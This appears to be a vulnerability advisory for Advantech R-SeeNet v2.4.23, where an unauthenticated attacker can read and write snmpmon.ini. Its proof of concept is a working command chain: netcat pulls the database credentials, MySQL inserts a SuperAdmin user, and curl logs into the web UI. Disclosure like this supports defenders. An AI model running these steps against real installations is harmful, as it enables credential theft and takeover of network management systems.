Advantech R-SeeNet snmpmon.ini Unauthenticated Read Write

Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file, which contains sensitive information. This information includes database login credentials and a default SNMP community string.

The attacker can leverage this issue to launch further attacks. For example, the attacker can login to the product database, create an application-level SuperAdmin user and login to the product web UI as a SuperAdmin user.

Proof of Concept

# Get the product version, database username and password
echo -n 'get Web.last_version; Database.User; Database.Password' | nc <target-host> 65031
R-SeeNet connect
Web.last_version 2.4.23;Database.User SNMPMON;Database.Password <REDACTED>

# Login to the product database and add a SuperAdmin user (i.e., rights=0)
mysql -h <target-host> -u SNMPMON -D snmpmon -p
Enter password:
[...]
mysql> INSERT INTO snmpmon.users (company_id, username, password, name, surname, email, phone, rights, edit_device) VALUES(0, 'operator', PASSWORD('password123'), NULL, NULL, NULL, NULL, 0, 0);
mysql> select company_id,username,password,rights from users where username='operator';
+------------+----------+-------------------------------------------+--------+
| company_id | username | password                                  | rights |
+------------+----------+-------------------------------------------+--------+
|          0 | operator | *A0F874BC7F54EE086FCE60A37CE7887D8B31086B |      0 |
+------------+----------+-------------------------------------------+--------+

# Login to the R-SeeNet web UI
curl -sk -d 'page=login_change&oper=0&username=operator&password=password123&submit=Login' 'https://<target-host>/index.php' | grep 'User is succesfully logged'
User is succesfully logged